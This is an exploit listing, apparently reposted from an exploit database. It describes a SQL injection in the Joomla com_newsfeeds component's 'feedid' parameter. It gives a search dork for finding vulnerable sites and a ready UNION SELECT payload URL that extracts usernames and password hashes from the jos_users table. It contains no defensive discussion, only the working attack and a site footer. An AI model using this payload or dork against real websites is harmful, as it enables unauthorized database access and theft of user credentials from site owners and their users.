# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Date: 2020-03-10 # Author: Milad Karimi # Software Link: # Version: # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_newsfeeds index.php?option=com_newsfeeds&view=categories&feedid=[sqli] Example: http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
